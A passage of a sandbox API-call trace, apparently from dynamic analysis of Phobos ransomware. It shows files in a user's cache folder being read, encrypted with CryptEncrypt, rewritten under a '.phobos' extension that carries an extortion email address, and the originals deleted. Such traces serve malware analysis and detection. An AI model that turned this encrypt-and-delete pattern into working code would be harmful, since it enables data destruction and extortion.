dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.701] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.702] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.702] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.702] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x5ee, lpOverlapped=0x0) returned 1 [0196.724] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5f0) returned 1 [0196.724] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x5f0, lpOverlapped=0x0) returned 1 [0196.725] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a68) returned 1 [0196.725] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.725] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.725] CryptDestroyKey (hKey=0xa32a68) returned 1 [0196.725] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.725] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.725] CloseHandle (hObject=0x17c) returned 1 [0196.725] CloseHandle (hObject=0x14c) returned 1 [0196.725] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001")) returned 1 [0196.726] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.727] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1517) returned 1 [0196.727] CloseHandle (hObject=0x14c) returned 1 [0196.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc")) returned 0x2024 [0196.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.727] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.727] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.728] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.728] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.728] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x5ed, lpOverlapped=0x0) returned 1 [0196.733] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x5f0) returned 1 [0196.733] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x5f0, lpOverlapped=0x0) returned 1 [0196.734] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0196.734] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.734] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.734] CryptDestroyKey (hKey=0xa32be8) returned 1 [0196.734] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.734] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.734] CloseHandle (hObject=0x14c) returned 1 [0196.734] CloseHandle (hObject=0x17c) returned 1 [0196.734] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc")) returned 1 [0196.735] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.736] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1763) returned 1 [0196.736] CloseHandle (hObject=0x17c) returned 1 [0196.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873")) returned 0x2024 [0196.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0196.736] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.736] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0196.737] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0196.737] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.737] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6e3, lpOverlapped=0x0) returned 1 [0196.831] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0, dwBufLen=0x6f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0) returned 1 [0196.831] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6f0, lpOverlapped=0x0) returned 1 [0196.832] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0196.832] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.832] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.832] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0196.832] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.832] CryptDestroyKey (hKey=0xa32a28) returned 1 [0196.832] CloseHandle (hObject=0x17c) returned 1 [0196.833] CloseHandle (hObject=0x14c) returned 1 [0196.833] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873")) returned 1 [0196.834] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.834] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.851] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1763) returned 1 [0196.851] CloseHandle (hObject=0x178) returned 1 [0196.851] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce")) returned 0x2024 [0196.851] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.851] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.851] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.852] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0196.852] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.852] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x6e3, lpOverlapped=0x0) returned 1 [0196.944] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0, dwBufLen=0x6f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x6f0) returned 1 [0196.944] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x6f0, lpOverlapped=0x0) returned 1 [0196.944] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ae8) returned 1 [0196.944] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.944] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.944] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.944] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.945] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.945] CloseHandle (hObject=0x178) returned 1 [0196.945] CloseHandle (hObject=0x130) returned 1 [0196.945] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce")) returned 1 [0196.946] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.946] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.953] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1611) returned 1 [0196.953] CloseHandle (hObject=0x130) returned 1 [0196.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585")) returned 0x2024 [0196.954] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.954] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.954] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.954] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.954] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0196.954] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.954] ReadFile (in: hFile=0x130, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x64b, lpOverlapped=0x0) returned 1 [0196.961] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x650, dwBufLen=0x650 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x650) returned 1 [0196.962] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x650, lpOverlapped=0x0) returned 1 [0196.962] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: 